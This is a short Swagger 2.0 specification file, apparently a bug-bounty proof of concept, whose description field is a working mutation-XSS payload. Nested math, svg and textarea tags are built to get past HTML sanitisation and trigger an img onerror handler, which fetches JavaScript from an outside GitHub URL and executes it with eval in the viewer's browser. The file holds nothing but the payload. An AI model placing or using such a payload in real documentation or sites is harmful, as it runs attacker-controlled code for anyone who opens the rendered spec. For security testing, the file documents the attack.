swagger: '2.0'
info:
  title: Swagger XSS payload provided by a shorty gremlin
  description: <math><mtext><h1><a><h6></a></h6><mglyph><svg><mtext><textarea><a title='</textarea><img src onerror=fetch(`https://github.com/github-bounty/shorty-swagger-pocs/poc.js`).then(function(res){res.text().then(function(data){eval(data)})})>'></textarea></h1>">"</textarea></desc></textarea></mtext></mtext></svg></mglyph></option></mtext></math>
  version: production
